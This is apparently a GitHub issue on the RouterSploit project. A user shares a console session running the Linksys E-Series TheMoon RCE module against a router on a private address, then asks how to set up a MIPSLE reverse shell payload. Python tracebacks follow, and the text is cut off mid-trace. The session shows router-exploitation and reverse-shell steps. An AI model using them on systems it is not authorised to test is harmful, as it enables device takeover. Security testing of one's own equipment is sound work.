routersploit
routersploit copied to clipboard
threat9
New to routersploit, what to do after run of exploit in cmd?
! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !
Steps to Reproduce (for bugs)
- Not a bug, just need guidance
Your Environment
- RouterSploit Version used: 3.4.1
- Operating System and version: Kali 2021.3
- Python Version: 3.9.7
- Python Environment: There's too many packages to display here, but I just installed the routersploit requirements today (July 3).
Current Behavior
- It's better if I show you the steps I ran in the output:
[+] 172.16.1.254 Device is vulnerable:
Target Port Service Exploit
------ ---- ------- -------
172.16.1.254 80 http exploits/routers/linksys/eseries_themoon_rce
[-] 172.16.1.254 Could not find default credentials
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port
Module options:
Name Current settings Description
---- ---------------- -----------
verbosity true Verbosity enabled: true/false
arch mipsle Target architecture: mipsbe, mipsle
rsf (Linksys E-Series TheMoon RCE) > set target 172.16.1.254
[+] target => 172.16.1.254
rsf (Linksys E-Series TheMoon RCE) > check
[+] Target is vulnerable
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.
cmd > use mipsle/reverse_tcp
[*] Executing 'use mipsle/reverse_tcp' on the device...
cmd > set lhost 172.16.1.228
[*] Executing 'set lhost 172.16.1.228' on the device...
cmd > set lport 4321
[*] Executing 'set lport 4321' on the device...
cmd > run
[*] Executing 'run' on the device...
cmd > execute
[*] Executing 'execute' on the device...
cmd > use payloads/mipsle/reverse_tcp
[*] Executing 'use payloads/mipsle/reverse_tcp' on the device...
cmd >
Expected Behavior
- As you can see at the end there, I was trying to figure out what to do, but essentially, I followed the steps to find the specific vulnerabilities of my router, and it found the
exploits/routers/linksys/eseries_themoon_rceexploit, which is odd because my router is a 2wire, but maybe they're the same thing. - Once I
usethe exploit, set my router as thetarget, it seems to open acmdterminal environment to the device. Is this normal? It says that it's a blind command injection, which is fine, however I try touse use mipsle/reverse_tcpto attempt a reverse shell, but I think I'm doing this wrong.
Do I create the reverse shell OUTSIDE of this cmd first, and then somehow run an inject command to inject that payload into the router? And if so, how do I accomplish that? The tutorials on here show how to create the payload, but nothing from there.
Traceback (most recent call last): File "interpreter.py", line 389, in command_run self.current_module.run() File "eseries_themoon_rce.py", line 54, in run shell(self, architecture="mipsle", method="wget", location="/tmp") File "shell.py", line 124, in shell data = payload.generate() ^^^^^^^^^^^^^^^^^^ File "reverse_tcp.py", line 21, in generate reverse_ip = utils.convert_ip(self.lhost) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "utils.py", line 69, in convert_ip res += bytes([int(i)]) ^^^^^^ ValueError: invalid literal for int() with base 10: ''
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "rsf.py", line 29, in
